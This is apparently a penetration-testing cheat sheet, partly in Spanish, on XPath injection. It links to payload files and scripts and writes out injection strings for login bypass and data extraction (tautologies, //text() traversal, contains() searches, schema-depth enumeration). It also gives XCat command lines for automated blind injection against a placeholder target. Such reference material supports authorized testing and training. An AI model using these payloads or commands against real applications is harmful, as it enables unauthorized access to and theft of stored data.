# XPath injection

## Identificación

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/common-xpath-injection-payloads.txt>

## Authentication bypass

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/xpath-injection-authentication-bypass.txt>

## Data exfiltration

```
invalid') or ('1'='1
 | //text()
..//text()
../..//text()
../../..//text()
../../../..//text()
../../../../..//text()
1234 or contains(.,'<text-to-search>')
```

### Schema depth

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/xpath_schema_depth_generator.py>

```
| /*[1]
| /*[1]/*[1]
| /*[1]/*[2]
| /*[1]/*[3]
| /*[1]/*[1]/*[1]
| /*[1]/*[1]/*[2]
| /*[1]/*[1]/*[3]
| /*[1]/*[2]/*[1]
| /*[1]/*[2]/*[2]
| /*[1]/*[2]/*[3]
| /*[1]/*[3]/*[1]
| /*[1]/*[3]/*[2]
| /*[1]/*[3]/*[3]
```

### Blind

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/xpath_injection_blind.py>

## Herramientas

### XCat

* <https://github.com/orf/xcat>

{% hint style="info" %}
Especificar al parámetro vulnerable (`<vulnerable-param>`) un valor de muestra que conduzca a un resultado positivo (`<true-condition>`).
{% endhint %}

```sh
# GET
xcat run -m GET http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --headers=<headers.txt>
# POST
xcat run -m POST http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --encode=form --headers=<headers.txt>
```